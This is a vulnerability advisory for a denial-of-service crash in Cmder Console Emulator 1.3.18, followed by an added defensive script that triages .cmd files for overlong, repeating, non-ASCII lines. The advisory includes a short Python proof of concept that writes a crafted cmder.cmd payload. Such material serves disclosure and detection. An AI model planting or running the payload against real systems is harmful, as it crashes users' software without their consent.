Cmder Console Emulator version 1.3.18 suffers from a denial of service vulnerability.
# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)
# Date: 2021-10-07
# Exploit Author: Aryan Chehreghani
# Vendor Homepage: https://cmder.net
# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip
# Version: v1.3.18
# Tested on: Windows 10
# [About - Cmder Console Emulator] :
# Cmder is a software package created because of the absence of a usable console emulator on Windows.
# It is based on ConEmu with a major config overhaul, and comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout.
# [Security Issue] :
# Requires the execution of a .cmd file: when the created file is run in the emulator, it triggers the buffer overflow condition.
# E.g. λ cmder.cmd
# [POC] :
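# Build the payload: chr(235) followed by "CMDER", repeated 3000 times
PAYLOAD = chr(235) + "CMDER"
PAYLOAD = PAYLOAD * 3000
# Write the payload to cmder.cmd
with open("cmder.cmd", "w") as f:
    f.write(PAYLOAD)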
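A defensive triage check, added here as an example and not part of the original advisory: it inspects a .cmd file before it is run and reports the properties the PoC file exhibits (a single very long line, non-ASCII bytes, a short repeating unit). The function names and the use of cmd.exe's 8191-character command-line limit as the flag threshold are assumptions; the advisory does not state the root cause.

```python
import sys
from pathlib import Path

# cmd.exe's documented maximum command-line length, in characters.
# Using it as the threshold is an assumption of this example.
CMD_MAX_LINE = 8191


def smallest_period(data: bytes, max_unit: int = 64) -> int:
    """Length of the shortest unit (<= max_unit) that repeats to form data, else 0."""
    for n in range(1, min(max_unit, len(data) // 2) + 1):
        if len(data) % n == 0 and data == data[:n] * (len(data) // n):
            return n
    return 0


def triage_batch(raw: bytes) -> dict:
    """Summarise the shape of a batch file's contents without executing it."""
    lines = raw.splitlines() or [b""]
    longest = max(lines, key=len)
    return {
        "lines": len(lines),
        "longest_line": len(longest),
        "non_ascii_bytes": sum(b > 0x7F for b in raw),
        "repeat_unit": smallest_period(longest),
        # Flag any line longer than cmd.exe accepts as a single command.
        "suspicious": len(longest) > CMD_MAX_LINE,
    }


if __name__ == "__main__":
    # Usage: python triage_batch.py file1.cmd [file2.bat ...]
    for name in sys.argv[1:]:
        report = triage_batch(Path(name).read_bytes())
        verdict = "SUSPICIOUS" if report["suspicious"] else "ok"
        print(f"{name}: {verdict} {report}")
```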